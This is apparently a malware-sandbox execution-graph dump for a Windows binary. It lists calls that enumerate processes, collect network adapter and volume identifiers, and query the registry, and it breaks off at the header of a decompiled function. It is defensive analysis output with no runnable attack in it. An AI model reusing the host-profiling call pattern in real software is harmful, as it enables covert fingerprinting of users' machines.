                                                                                                                                                              • Instruction ID: b558ea7b0bda545cdd0d0469fd2faa6860c5ea73d6a9a95f63225905000151d8
                                                                                                                                                              • Opcode Fuzzy Hash: b129a49fb17cda45a3e2543e7a7beb14cd044c8e1aafb511fd7e688c02b2ea7c
                                                                                                                                                              • Instruction Fuzzy Hash: BDE02B74C081312B972137184C07EBFB558DFE3760F809920FCC160065E6208D6341D2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:13.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:1.4%
                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                              Total number of Limit Nodes:69
_Immortalize 32938->32939 32940 4175c0 _Immortalize 69 API calls 32939->32940 32941 484b79 32940->32941 32952 484b20 32941->32952 32944 484b9b 32946 4176e0 codecvt 69 API calls 32944->32946 32945 49e7e0 _Immortalize 71 API calls 32945->32944 32947 484bca 32946->32947 32948 44f6c8 __putwch_nolock 5 API calls 32947->32948 32949 484be2 32948->32949 32949->32905 32949->32906 32950->32911 32951->32911 32955 495e20 32952->32955 32956 495e53 _Immortalize std::_Iterator_base::_Iterator_base 32955->32956 32957 417910 _Immortalize 77 API calls 32956->32957 32958 495e73 32957->32958 32959 4130d0 _Immortalize 77 API calls 32958->32959 32960 495e83 _Immortalize 32959->32960 32961 41eea0 2 API calls 32960->32961 32964 495e9b _memset 32961->32964 32962 495fa5 32963 4176e0 codecvt 69 API calls 32962->32963 32965 495fbb 32963->32965 32964->32962 32966 41ede0 RegQueryValueExW 32964->32966 32967 41ef60 RegCloseKey 32965->32967 32969 495ee7 32966->32969 32968 495f9d 32967->32968 32970 44f6c8 __putwch_nolock 5 API calls 32968->32970 32969->32962 32972 495eef _wcslen 32969->32972 32971 484b31 32970->32971 32971->32944 32971->32945 32973 495f24 PathAddBackslashW 32972->32973 32974 495f3c _Immortalize 32973->32974 32975 417910 _Immortalize 77 API calls 32974->32975 32976 495f4f 32975->32976 32977 4181d0 _Immortalize 77 API calls 32976->32977 32978 495f62 32977->32978 32979 4176e0 codecvt 69 API calls 32978->32979 32980 495f71 _Immortalize 32979->32980 32981 4176e0 codecvt 69 API calls 32980->32981 32982 495f8e 32981->32982 32983 41ef60 RegCloseKey 32982->32983 32983->32968 32985 48c860 _Immortalize 32984->32985 32986 4175c0 _Immortalize 69 API calls 32985->32986 32987 48c869 32986->32987 33009 48bd40 32987->33009 32989 48c879 32990 48c90c 32989->32990 32991 48c884 32989->32991 32992 4176e0 codecvt 69 API calls 32990->32992 32993 4098d0 _Immortalize 77 API calls 32991->32993 33006 48c907 32992->33006 32994 48c8af 32993->32994 32997 409810 _Immortalize 77 API calls 32994->32997 32995 44f6c8 
__putwch_nolock 5 API calls 32996 48c937 32995->32996 32996->32917 32996->32918 32998 48c8cb 32997->32998 32999 49e7e0 _Immortalize 71 API calls 32998->32999 33000 48c8da 32999->33000 33001 4176e0 codecvt 69 API calls 33000->33001 33002 48c8ec 33001->33002 33003 4178c0 codecvt 69 API calls 33002->33003 33004 48c8f8 33003->33004 33005 4176e0 codecvt 69 API calls 33004->33005 33005->33006 33006->32995 33007->32925 33008->32925 33010 495e20 81 API calls 33009->33010 33011 48bd73 33010->33011 33012 495d00 80 API calls 33011->33012 33025 48bd7a _Immortalize 33011->33025 33013 48bd99 33012->33013 33014 4130d0 _Immortalize 77 API calls 33013->33014 33013->33025 33015 48bdb9 33014->33015 33016 4098d0 _Immortalize 77 API calls 33015->33016 33017 48bde3 33016->33017 33018 409810 _Immortalize 77 API calls 33017->33018 33019 48be02 33018->33019 33020 49e7e0 _Immortalize 71 API calls 33019->33020 33021 48be11 33020->33021 33022 4176e0 codecvt 69 API calls 33021->33022 33023 48be23 33022->33023 33024 4178c0 codecvt 69 API calls 33023->33024 33024->33025 33025->32989 33026->32935 33027->32935 33053 404430 33054 404451 33053->33054 33066 40444c 33053->33066 33067 403a70 9 API calls 33054->33067 33056 404472 33057 4044a5 33056->33057 33056->33066 33099 4f3610 205 API calls 4 library calls 33056->33099 33058 4044df 33057->33058 33057->33066 33100 4efcd0 SetWindowPos 33057->33100 33061 404519 33058->33061 33058->33066 33068 4f3ed0 33058->33068 33065 404553 33061->33065 33061->33066 33101 4f0410 83 API calls _Immortalize 33061->33101 33065->33066 33102 4efc10 ShowWindow DestroyWindow codecvt 33065->33102 33067->33056 33073 4f3f03 33068->33073 33069 4f4069 33129 4049b0 76 API calls _Immortalize 33069->33129 33071 4f3fae 33071->33069 33077 4f405a 33071->33077 33103 4049b0 76 API calls _Immortalize 33071->33103 33072 4f406e 33130 4049b0 76 API calls _Immortalize 33072->33130 33073->33071 33074 4f3f5c 33073->33074 33075 4f3f7a 33073->33075 33122 417430 VariantClear 33074->33122 33076 
4f3f94 33075->33076 33123 4161a0 IsWindow 33075->33123 33124 417430 VariantClear 33076->33124 33128 417430 VariantClear 33077->33128 33081 4f3f72 33081->33061 33085 4f4002 33104 4e40d0 33085->33104 33086 4f407f 33131 415f10 DestroyWindow 33086->33131 33090 4f4098 33092 4f40ba 33090->33092 33094 4f40a6 PostMessageW 33090->33094 33091 4f4020 33125 4049b0 76 API calls _Immortalize 33091->33125 33092->33081 33094->33092 33095 4f4027 33126 415f30 SetFocus 33095->33126 33097 4f403f 33127 417430 VariantClear 33097->33127 33099->33057 33100->33058 33101->33065 33102->33066 33103->33085 33132 424aa0 85 API calls _Immortalize 33104->33132 33106 4e4106 33133 4cd7c0 119 API calls 33106->33133 33108 4e411c 33134 4cd7f0 119 API calls 33108->33134 33110 4e412e 33135 425e10 22 API calls _Immortalize 33110->33135 33112 4e4159 33113 4e4190 33112->33113 33114 4e4160 33112->33114 33166 424d70 71 API calls codecvt 33113->33166 33136 4e2680 33114->33136 33118 4e4188 33120 44f6c8 __putwch_nolock 5 API calls 33118->33120 33121 4e41c7 33120->33121 33121->33077 33121->33091 33122->33081 33123->33076 33124->33071 33125->33095 33126->33097 33127->33081 33128->33069 33129->33072 33130->33086 33131->33090 33132->33106 33133->33108 33134->33110 33135->33112 33167 4dc1b0 79 API calls 4 library calls 33136->33167 33138 4e26b6 _Immortalize 33139 4e26e1 33138->33139 33400 4cb860 77 API calls _Immortalize 33138->33400 33168 4099f0 77 API calls 33139->33168 33142 4e2708 33143 4e2726 33142->33143 33144 4e2712 33142->33144 33169 4dffd0 33143->33169 33145 4176e0 codecvt 69 API calls 33144->33145 33147 4e2721 33145->33147 33149 44f6c8 __putwch_nolock 5 API calls 33147->33149 33150 4e2814 33149->33150 33165 424d70 71 API calls codecvt 33150->33165 33165->33118 33166->33118 33167->33138 33168->33142 33170 4e000d _Immortalize 33169->33170 33171 4175c0 _Immortalize 69 API calls 33170->33171 33172 4e0016 _Immortalize 33171->33172 33173 4175c0 _Immortalize 69 API calls 33172->33173 33174 4e002e 33173->33174 
33409 4d6610 33174->33409 33181 4178c0 codecvt 69 API calls 33182 4e00a6 33181->33182 33430 4fdb00 33182->33430 33185 4181d0 _Immortalize 77 API calls 33186 4e00da 33185->33186 33187 4176e0 codecvt 69 API calls 33186->33187 33188 4e00e9 _Immortalize 33187->33188 33189 4e0166 33188->33189 33193 409760 77 API calls 33188->33193 33502 4228a0 33189->33502 33195 4e012f 33193->33195 33196 405120 77 API calls 33195->33196 33197 4e0157 33196->33197 33199 4178c0 codecvt 69 API calls 33197->33199 33198 409760 77 API calls 33200 4e01d7 33198->33200 33199->33189 33201 405120 77 API calls 33200->33201 33202 4e01ff 33201->33202 33203 4178c0 codecvt 69 API calls 33202->33203 33204 4e020e 33203->33204 33205 4176e0 codecvt 69 API calls 33204->33205 33206 4e021d _Immortalize 33205->33206 33207 417910 _Immortalize 77 API calls 33206->33207 33208 4e0239 33207->33208 33528 4f4dc0 33208->33528 33210 4e0284 33211 4098d0 _Immortalize 77 API calls 33210->33211 33212 4e0298 33211->33212 33213 405120 77 API calls 33212->33213 33214 4e02c0 33213->33214 33215 4178c0 codecvt 69 API calls 33214->33215 33216 4e02cf 33215->33216 33217 4176e0 codecvt 69 API calls 33216->33217 33218 4e02de 33217->33218 33536 49d9c0 CreateToolhelp32Snapshot 33218->33536 33221 49d9c0 10 API calls 33222 4e02f2 33221->33222 33546 496160 33222->33546 33224 4e03d1 _Immortalize 33227 417910 _Immortalize 77 API calls 33224->33227 33225 4e02fb _Immortalize 33225->33224 33226 417910 _Immortalize 77 API calls 33225->33226 33231 4e0322 _Immortalize 33226->33231 33228 4e03ed 33227->33228 33569 501ce0 33228->33569 33233 4e0370 PathFindFileNameW 33231->33233 33235 4098d0 _Immortalize 77 API calls 33233->33235 33237 4e038b 33235->33237 33239 405120 77 API calls 33237->33239 33241 4e03b3 33239->33241 33243 4178c0 codecvt 69 API calls 33241->33243 33242 4e0434 33615 4dcb20 33242->33615 33244 4e03c2 33243->33244 33245 4176e0 codecvt 69 API calls 33244->33245 33245->33224 33247 4e045d _Immortalize 33624 48cc50 33247->33624 33252 47f670 
72 API calls 33253 4e0489 33252->33253 33254 416600 111 API calls 33253->33254 33255 4e049b 33254->33255 33256 4176e0 codecvt 69 API calls 33255->33256 33400->33139 33410 4d663d _Immortalize 33409->33410 33411 417910 _Immortalize 77 API calls 33410->33411 33412 4d664b 33411->33412 33413 4181d0 _Immortalize 77 API calls 33412->33413 33414 4d665e 33413->33414 33415 4176e0 codecvt 69 API calls 33414->33415 33416 4d666d 33415->33416 33417 409760 33416->33417 33958 4050e0 33417->33958 33420 405120 77 API calls 33421 4097b4 33420->33421 33422 417620 allocator 77 API calls 33421->33422 33423 4097bd 33422->33423 33424 4178c0 codecvt 69 API calls 33423->33424 33425 4097d2 33424->33425 33426 409880 33425->33426 33427 409891 _Immortalize 33426->33427 33964 4163a0 33427->33964 33431 4fdb3d _Immortalize 33430->33431 33432 4175c0 _Immortalize 69 API calls 33431->33432 33433 4fdb46 _Immortalize 33432->33433 33434 4175c0 _Immortalize 69 API calls 33433->33434 33435 4fdb5e 33434->33435 33971 4fd9e0 33435->33971 33438 4181d0 _Immortalize 77 API calls 33439 4fdb93 33438->33439 33440 4176e0 codecvt 69 API calls 33439->33440 33441 4fdb9f _Immortalize 33440->33441 33442 4fdc1c 33441->33442 33446 409760 77 API calls 33441->33446 33976 4fda50 33442->33976 33445 4181d0 _Immortalize 77 API calls 33447 4fdc52 33445->33447 33448 4fdbe5 33446->33448 33449 4176e0 codecvt 69 API calls 33447->33449 33450 409880 77 API calls 33448->33450 33457 4fdc61 _Immortalize 33449->33457 33451 4fdc0d 33450->33451 33452 4178c0 codecvt 69 API calls 33451->33452 33452->33442 33453 4fdcfe 33454 490220 76 API calls 33453->33454 33455 4fdd11 33454->33455 33456 4901a0 77 API calls 33455->33456 33459 4fdd18 33456->33459 33457->33453 33458 4fdc90 33457->33458 33460 4130d0 _Immortalize 77 API calls 33457->33460 33462 409760 77 API calls 33458->33462 33461 4181d0 _Immortalize 77 API calls 33459->33461 33460->33458 33463 4fdd3d 33461->33463 33465 4fdcc7 33462->33465 33464 4176e0 codecvt 69 API calls 33463->33464 33473 
4fdd4c _Immortalize 33464->33473 33466 405120 77 API calls 33465->33466 33467 4fdcef 33466->33467 33468 4178c0 codecvt 69 API calls 33467->33468 33468->33453 33469 4fdde9 33470 490220 76 API calls 33469->33470 33471 4fddfc 33470->33471 33472 4901a0 77 API calls 33471->33472 33475 4fde03 33472->33475 33473->33469 33474 4fdd7b 33473->33474 33476 4130d0 _Immortalize 77 API calls 33473->33476 33479 409760 77 API calls 33474->33479 33477 4181d0 _Immortalize 77 API calls 33475->33477 33476->33474 33478 4fde28 33477->33478 33480 4176e0 codecvt 69 API calls 33478->33480 33481 4fddb2 33479->33481 33485 4fde37 _Immortalize 33480->33485 33482 405120 77 API calls 33481->33482 33483 4fddda 33482->33483 33484 4178c0 codecvt 69 API calls 33483->33484 33484->33469 33486 4fde53 33485->33486 33487 4130d0 _Immortalize 77 API calls 33485->33487 33488 409760 77 API calls 33486->33488 33487->33486 33489 4fde8a 33488->33489 33490 405120 77 API calls 33489->33490 33491 4fdeb2 33490->33491 33492 4178c0 codecvt 69 API calls 33491->33492 33493 4fdec1 33492->33493 33494 417660 allocator 77 API calls 33493->33494 33495 4fdecd 33494->33495 33496 4176e0 codecvt 69 API calls 33495->33496 33497 4fdee8 33496->33497 33498 4176e0 codecvt 69 API calls 33497->33498 33499 4fdef4 33498->33499 33500 44f6c8 __putwch_nolock 5 API calls 33499->33500 33501 4e00b2 33500->33501 33501->33185 33503 4228cc 33502->33503 33507 4228f6 33502->33507 33990 422840 33503->33990 33506 44fae5 _Immortalize 76 API calls 33506->33507 33508 483530 33507->33508 33509 48356d _Immortalize 33508->33509 33510 483600 33509->33510 33994 483240 33509->33994 33512 417660 allocator 77 API calls 33510->33512 33514 48360c 33512->33514 33515 44f6c8 __putwch_nolock 5 API calls 33514->33515 33517 483634 33515->33517 33517->33198 33518 48358f _Immortalize 33519 4835cb _Immortalize 33518->33519 33520 4835a5 33518->33520 33524 416600 111 API calls 33519->33524 34016 4832f0 6 API calls __putwch_nolock 33520->34016 33522 4835ad 33523 416600 111 
API calls 33522->33523 33525 4835c6 33523->33525 33526 4835f1 33524->33526 33525->33526 33527 4176e0 codecvt 69 API calls 33526->33527 33527->33510 33529 4f4dec 33528->33529 33533 4f4e16 _Immortalize 33528->33533 34019 4f4b50 33529->34019 33532 44fae5 _Immortalize 76 API calls 33532->33533 33535 4f4e3b _Immortalize 33533->33535 34023 4f4bc0 33533->34023 33535->33210 33537 49da8b 33536->33537 33538 49d9f0 33536->33538 33541 44f6c8 __putwch_nolock 5 API calls 33537->33541 33539 49da09 Process32FirstW 33538->33539 33540 49da00 GetCurrentProcessId 33538->33540 33544 49da24 33539->33544 33540->33539 33542 49da98 33541->33542 33542->33221 33543 49da81 FindCloseChangeNotification 33543->33537 33544->33543 33545 49da49 Process32NextW 33544->33545 33545->33544 33547 4961ab _memset _Immortalize 33546->33547 33548 417910 _Immortalize 77 API calls 33547->33548 33549 4961ca 33548->33549 33550 4181d0 _Immortalize 77 API calls 33549->33550 33551 4961e0 33550->33551 33552 4176e0 codecvt 69 API calls 33551->33552 33553 4961f2 OpenProcess 33552->33553 33554 496210 EnumProcessModules 33553->33554 33555 4962ce _Immortalize 33553->33555 33556 49625f GetProcessImageFileNameW 33554->33556 33557 496241 GetModuleFileNameExW K32GetModuleFileNameExW 33554->33557 33558 44f6c8 __putwch_nolock 5 API calls 33555->33558 33559 496278 CloseHandle 33556->33559 33560 496286 _Immortalize 33556->33560 33557->33556 33561 4962fc 33558->33561 33559->33555 33562 417910 _Immortalize 77 API calls 33560->33562 33561->33225 33563 4962a4 33562->33563 33564 4181d0 _Immortalize 77 API calls 33563->33564 33565 4962ba 33564->33565 33566 4176e0 codecvt 69 API calls 33565->33566 33567 4962cc FindCloseChangeNotification 33566->33567 33567->33555 34041 41c3a0 33569->34041 33572 501530 34061 41c9d0 33572->34061 33574 50156f codecvt 33575 5015b4 33574->33575 33576 50158b 33574->33576 34067 41c1b0 69 API calls _Immortalize 33575->34067 34066 41c470 77 API calls allocator 33576->34066 33578 4e040b 33580 490220 33578->33580 
34090 442fa0 33580->34090 33583 490d50 33584 490d93 _Immortalize 33583->33584 33585 4175c0 _Immortalize 69 API calls 33584->33585 33586 490d9c 33585->33586 33587 4908a0 96 API calls 33586->33587 33588 490db2 33587->33588 33589 490dd8 _Immortalize 33588->33589 33590 490dc1 33588->33590 33592 417910 _Immortalize 77 API calls 33589->33592 33591 490e0c _Immortalize 33590->33591 33595 490dca _Immortalize 33590->33595 33594 417910 _Immortalize 77 API calls 33591->33594 33596 490dee 33592->33596 33593 417660 allocator 77 API calls 33597 490e8a 33593->33597 33598 490e22 33594->33598 33599 417910 _Immortalize 77 API calls 33595->33599 33610 490dd3 33595->33610 33600 4181d0 _Immortalize 77 API calls 33596->33600 33601 4176e0 codecvt 69 API calls 33597->33601 33602 4181d0 _Immortalize 77 API calls 33598->33602 33603 490e5c 33599->33603 33604 490dfe 33600->33604 33607 490ea5 33601->33607 33608 490e32 33602->33608 33605 4181d0 _Immortalize 77 API calls 33603->33605 33606 4176e0 codecvt 69 API calls 33604->33606 33609 490e6f 33605->33609 33606->33610 33611 44f6c8 __putwch_nolock 5 API calls 33607->33611 33612 4176e0 codecvt 69 API calls 33608->33612 33613 4176e0 codecvt 69 API calls 33609->33613 33610->33593 33614 490ebd 33611->33614 33612->33610 33613->33610 33614->33242 33616 490220 76 API calls 33615->33616 33617 4dcb2d 33616->33617 34097 491fb0 33617->34097 33620 4dcb49 33620->33247 33621 490220 76 API calls 33622 4dcb42 33621->33622 34170 491190 33622->34170 33625 48cc82 33624->33625 33629 48cc9d std::_Iterator_base::_Iterator_base 33624->33629 33626 48c830 86 API calls 33625->33626 33626->33629 33627 48ccbc 33628 44f6c8 __putwch_nolock 5 API calls 33627->33628 33631 48cdc6 33628->33631 33629->33627 33630 41eea0 2 API calls 33629->33630 33632 48cce9 33630->33632 33650 484ea0 33631->33650 33633 48cced _memset 33632->33633 33634 48cd36 _Immortalize 33632->33634 33635 41ede0 RegQueryValueExW 33633->33635 33636 4175c0 _Immortalize 69 API calls 33634->33636 33637 48cd1f 
33635->33637 33638 48cd47 33636->33638 34283 451cbd 80 API calls wcstoxl 33637->34283 34258 48c630 33638->34258 33641 48cd2c 33645 41ef60 RegCloseKey 33641->33645 33642 48cd54 33645->33627 33651 484ed2 33650->33651 33656 484eed std::_Iterator_base::_Iterator_base 33650->33656 33652 484b40 83 API calls 33651->33652 33652->33656 33653 484f8b 33654 44f6c8 __putwch_nolock 5 API calls 33653->33654 33655 484fa5 33654->33655 33655->33252 33656->33653 33657 41eea0 2 API calls 33656->33657 33660 484f2f _memset 33657->33660 33658 484f74 33659 41ef60 RegCloseKey 33658->33659 33659->33653 33660->33658 33661 41ede0 RegQueryValueExW 33660->33661 33662 484f67 33661->33662 34358 451cbd 80 API calls wcstoxl 33662->34358 33959 4050f1 _Immortalize 33958->33959 33960 417e70 codecvt 69 API calls 33959->33960 33961 405105 33960->33961 33962 417850 _Immortalize 77 API calls 33961->33962 33963 405111 33962->33963 33963->33420 33965 4163c2 33964->33965 33966 4163ad 33964->33966 33970 416560 77 API calls std::ios_base::clear 33965->33970 33967 4177a0 std::locale::_Locimp::_Addfac 77 API calls 33966->33967 33969 4098a3 33967->33969 33969->33181 33970->33969 33972 490220 76 API calls 33971->33972 33973 4fda1a 33972->33973 33974 4901a0 77 API calls 33973->33974 33975 4fda21 33974->33975 33975->33438 33977 490220 76 API calls 33976->33977 33978 4fda8f 33977->33978 33979 4901a0 77 API calls 33978->33979 33980 4fda96 _Immortalize 33979->33980 33987 4fdabd 33980->33987 33989 4fc760 111 API calls 3 library calls 33980->33989 33981 417660 allocator 77 API calls 33982 4fdacc 33981->33982 33983 4176e0 codecvt 69 API calls 33982->33983 33984 4fdae1 33983->33984 33986 44f6c8 __putwch_nolock 5 API calls 33984->33986 33988 4fdaf9 33986->33988 33987->33981 33988->33445 33989->33987 33991 422870 _Immortalize 33990->33991 33992 4175c0 _Immortalize 69 API calls 33991->33992 33993 422879 33992->33993 33993->33506 34017 451d90 33994->34017 33996 48327c GetSystemDirectoryW 33997 45508b __wsplitpath 69 API calls 
33996->33997 33998 4832b6 PathAddBackslashW GetVolumeInformationW 33997->33998 33999 44f6c8 __putwch_nolock 5 API calls 33998->33999 34000 4832ea 33999->34000 34001 483370 GetAdaptersAddresses 34000->34001 34002 44fbd9 _malloc 69 API calls 34001->34002 34003 4833dd 34002->34003 34004 483412 GetAdaptersAddresses 34003->34004 34006 4833e9 _Immortalize 34003->34006 34005 4834c7 34004->34005 34013 48342d 34004->34013 34007 44fafc ___free_lc_time 69 API calls 34005->34007 34009 4175c0 _Immortalize 69 API calls 34006->34009 34008 4834de _Immortalize 34007->34008 34011 417910 _Immortalize 77 API calls 34008->34011 34010 4833fa 34009->34010 34012 44f6c8 __putwch_nolock 5 API calls 34010->34012 34011->34010 34014 48351e 34012->34014 34013->34005 34015 48349d wsprintfW 34013->34015 34014->33518 34015->34013 34016->33522 34018 451d9c __VEC_memzero 34017->34018 34018->33996 34020 4f4b89 _Immortalize 34019->34020 34021 4175c0 _Immortalize 69 API calls 34020->34021 34022 4f4b95 34021->34022 34022->33532 34024 4f4bdb _memset __write_nolock 34023->34024 34025 4f4c02 GetVolumeInformationW 34024->34025 34026 451d90 _memset 34025->34026 34027 4f4c49 GetAdaptersInfo 34026->34027 34028 4f4c60 _memset 34027->34028 34029 4f4cca StringFromGUID2 34028->34029 34030 4f4cee _Immortalize 34029->34030 34031 417910 _Immortalize 77 API calls 34030->34031 34032 4f4d01 34031->34032 34033 4181d0 _Immortalize 77 API calls 34032->34033 34034 4f4d1d 34033->34034 34035 4176e0 codecvt 69 API calls 34034->34035 34036 4f4d2f _Immortalize 34035->34036 34037 4f4d8e _Immortalize 34036->34037 34038 417a20 _Immortalize 77 API calls 34036->34038 34039 44f6c8 __putwch_nolock 5 API calls 34037->34039 34038->34036 34040 4f4db1 34039->34040 34040->33535 34042 41c3f6 34041->34042 34043 41c3cc 34041->34043 34042->33572 34047 5015e0 34043->34047 34046 44fae5 _Immortalize 76 API calls 34046->34042 34050 41c750 34047->34050 34051 41c780 _Immortalize 34050->34051 34054 41cf00 34051->34054 34055 41cf37 _Immortalize 
_DebugHeapAllocator 34054->34055 34058 41d800 34055->34058 34057 41c3ec 34057->34046 34059 41e630 _Immortalize 77 API calls 34058->34059 34060 41d80f HandleT _Immortalize 34059->34060 34060->34057 34068 41cf70 34061->34068 34063 41ca23 codecvt 34063->33574 34064 41c9e9 codecvt std::_Cnd_initX Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 34064->34063 34071 41cc50 34064->34071 34066->33578 34067->33578 34075 41d870 34068->34075 34070 41cf83 _DebugHeapAllocator 34070->34064 34072 41cc5f 34071->34072 34079 41eb20 34072->34079 34078 41d881 HandleT std::_Cnd_initX _Immortalize 34075->34078 34076 41d8ee 34076->34070 34077 41cc50 77 API calls 34077->34078 34078->34076 34078->34077 34082 40a400 34079->34082 34083 40a40f _Immortalize 34082->34083 34086 4071f0 34083->34086 34085 40a42a 34085->34063 34087 407204 34086->34087 34089 407209 _Immortalize 34086->34089 34088 44f67a std::ios_base::clear 77 API calls 34087->34088 34088->34089 34089->34085 34091 442ff6 34090->34091 34092 442fcc 34090->34092 34091->33583 34096 48fff0 69 API calls 2 library calls 34092->34096 34094 442fec 34095 44fae5 _Immortalize 76 API calls 34094->34095 34095->34091 34096->34094 34098 491ff4 34097->34098 34164 491fea 34097->34164 34174 433e30 34098->34174 34100 44f6c8 __putwch_nolock 5 API calls 34101 492463 34100->34101 34101->33620 34101->33621 34102 492006 _Immortalize 34103 417910 _Immortalize 77 API calls 34102->34103 34104 49203e 34103->34104 34178 433fc0 34104->34178 34164->34100 34173 4911a9 34170->34173 34171 4911f3 34171->33620 34172 491160 102 API calls 34172->34173 34173->34171 34173->34172 34175 433e60 _Immortalize 34174->34175 34209 4364f0 34175->34209 34179 417660 allocator 77 API calls 34178->34179 34180 433ff2 34179->34180 34181 432780 34180->34181 34186 432791 HandleT codecvt std::_Cnd_initX 34181->34186 34210 436527 _Immortalize _DebugHeapAllocator 34209->34210 34213 43a690 34210->34213 34212 433e6d 34212->34102 34216 43a810 34213->34216 34215 43a69f HandleT 
codecvt 34215->34212 34217 433bf0 allocator 77 API calls 34216->34217 34218 43a84c HandleT codecvt std::_Cnd_initX allocator 34217->34218 34218->34215 34259 405140 77 API calls 34258->34259 34260 48c660 34259->34260 34261 48bd40 86 API calls 34260->34261 34262 48c669 34261->34262 34263 48c80c _Immortalize 34262->34263 34286 41f190 34262->34286 34263->33642 34283->33641 34287 41f1c3 _Immortalize 34286->34287 34358->33658 31820 401fc0 31821 40200b codecvt 31820->31821 31829 40210c codecvt 31821->31829 31832 401030 RaiseException codecvt _Immortalize Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 31821->31832 31823 402047 codecvt 31825 4020b5 codecvt 31823->31825 31833 4cc8c0 31823->31833 31825->31829 31870 4f71a0 80 API calls 3 library calls 31825->31870 31826 402088 31843 44fafc 31826->31843 31830 402097 31856 47f670 31830->31856 31832->31823 31834 4cc8ed _Immortalize 31833->31834 31835 4cc95c GlobalAlloc 31834->31835 31842 4cc8fa codecvt 31834->31842 31836 4cc992 _realloc 31835->31836 31835->31842 31837 4cc9a3 CreateStreamOnHGlobal 31836->31837 31838 4cc9c3 Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 31837->31838 31837->31842 31838->31842 31871 430540 31838->31871 31840 4cc9e8 Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 31840->31842 31877 4cc870 114 API calls 31840->31877 31842->31826 31845 44fb08 _realloc 31843->31845 31844 44fb81 _realloc 31844->31830 31845->31844 31846 457dfc __lock 67 API calls 31845->31846 31855 44fb47 31845->31855 31851 44fb1f ___sbh_find_block 31846->31851 31847 44fb5c RtlFreeHeap 31847->31844 31848 44fb6e 31847->31848 32326 454477 69 API calls __getptd_noexit 31848->32326 31850 44fb73 GetLastError 31850->31844 31852 44fb39 31851->31852 32324 457e5f __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 31851->32324 32325 44fb52 LeaveCriticalSection __freefls@4 31852->32325 31855->31844 31855->31847 31857 47f6a5 std::_Iterator_base::_Iterator_base 31856->31857 
31858 47f75a 31856->31858 32327 41eea0 31857->32327 31859 44f6c8 __putwch_nolock 5 API calls 31858->31859 31861 47f785 31859->31861 31861->31825 31862 47f748 32337 41ef60 31862->32337 31864 47f6c8 _memset 31864->31862 32333 41ede0 31864->32333 31867 47f727 31867->31862 32340 452133 69 API calls _vscan_fn 31867->32340 31868 41ede0 RegQueryValueExW 31868->31867 31870->31829 31872 43057c 31871->31872 31876 430572 codecvt 31871->31876 31878 44f76f 31872->31878 31876->31840 31877->31842 31879 44f779 31878->31879 31881 4305a1 31879->31881 31886 44f795 std::bad_alloc::bad_alloc 31879->31886 31893 44fbd9 31879->31893 31910 456ffc 7 API calls __decode_pointer 31879->31910 31881->31876 31890 430710 31881->31890 31883 44f7bb 31914 417c20 69 API calls std::exception::exception 31883->31914 31885 44f7c5 31915 456a4c RaiseException 31885->31915 31886->31883 31911 44fae5 31886->31911 31889 44f7d3 32123 42fbc0 31890->32123 31894 44fc8c 31893->31894 31906 44fbeb 31893->31906 31968 456ffc 7 API calls __decode_pointer 31894->31968 31896 44fc92 31969 454477 69 API calls __getptd_noexit 31896->31969 31901 44fc48 RtlAllocateHeap 31901->31906 31903 44fc78 31966 454477 69 API calls __getptd_noexit 31903->31966 31906->31901 31906->31903 31907 44fc7d 31906->31907 31909 44fc84 31906->31909 31916 458a9e 69 API calls 2 library calls 31906->31916 31917 4588f3 31906->31917 31961 45799c 31906->31961 31964 44fb8a 69 API calls 4 library calls 31906->31964 31965 456ffc 7 API calls __decode_pointer 31906->31965 31967 454477 69 API calls __getptd_noexit 31907->31967 31909->31879 31910->31879 32043 44faa9 31911->32043 31913 44faf2 31913->31883 31914->31885 31915->31889 31916->31906 31918 458907 31917->31918 31919 458a62 31918->31919 31970 46590f 69 API calls __wcsnicmp 31918->31970 31919->31906 31921 458929 31922 458a67 GetStdHandle 31921->31922 31971 46590f 69 API calls __wcsnicmp 31921->31971 31922->31919 31923 458a75 31922->31923 31923->31919 31925 458a7a _strlen 31923->31925 31928 458a8e WriteFile 
31925->31928 31926 45893a 31926->31922 31927 45894c 31926->31927 31927->31919 31972 457024 69 API calls __wcsnicmp 31927->31972 31928->31919 31930 45896e 31931 458975 31930->31931 31932 458982 GetModuleFileNameA 31930->31932 32003 45567d 10 API calls 3 library calls 31931->32003 31933 4589a0 31932->31933 31939 4589c6 _strlen 31932->31939 32004 457024 69 API calls __wcsnicmp 31933->32004 31935 45897f 31935->31932 31937 4589b0 31938 4589b7 31937->31938 31937->31939 32005 45567d 10 API calls 3 library calls 31938->32005 31940 458a0b 31939->31940 32006 46585a 69 API calls __wcsnicmp 31939->32006 31973 4657e6 69 API calls __wcsnicmp 31940->31973 31943 4589c3 31943->31939 31944 458a19 31946 458a20 31944->31946 31947 458a2d 31944->31947 32008 45567d 10 API calls 3 library calls 31946->32008 31974 4657e6 69 API calls __wcsnicmp 31947->31974 31948 4589f3 31948->31940 31949 4589fa 31948->31949 32007 45567d 10 API calls 3 library calls 31949->32007 31953 458a2a 31953->31947 31954 458a3e 31956 458a45 31954->31956 31957 458a52 31954->31957 31955 458a06 31955->31940 32009 45567d 10 API calls 3 library calls 31956->32009 31975 46567d 31957->31975 31960 458a4f 31960->31957 32039 457971 GetModuleHandleW 31961->32039 31964->31906 31965->31906 31966->31907 31967->31909 31968->31896 31969->31909 31970->31921 31971->31926 31972->31930 31973->31944 31974->31954 32010 45716e 31975->32010 31978 4656a0 LoadLibraryA 31980 4656b5 GetProcAddress 31978->31980 31981 4657ca 31978->31981 31979 46572e 31998 465752 31979->31998 32025 457177 TlsGetValue 31979->32025 31980->31981 31983 4656cb 31980->31983 31981->31919 31982 46577d 31987 457177 __decode_pointer 7 API calls 31982->31987 32013 4570fc TlsGetValue 31983->32013 31984 457177 __decode_pointer 7 API calls 31995 465795 31984->31995 31987->31981 31990 457177 __decode_pointer 7 API calls 31990->31998 31991 4570fc __encode_pointer 7 API calls 31992 4656e6 GetProcAddress 31991->31992 31993 4570fc __encode_pointer 7 API calls 31992->31993 31994 


                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E004F4BC0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
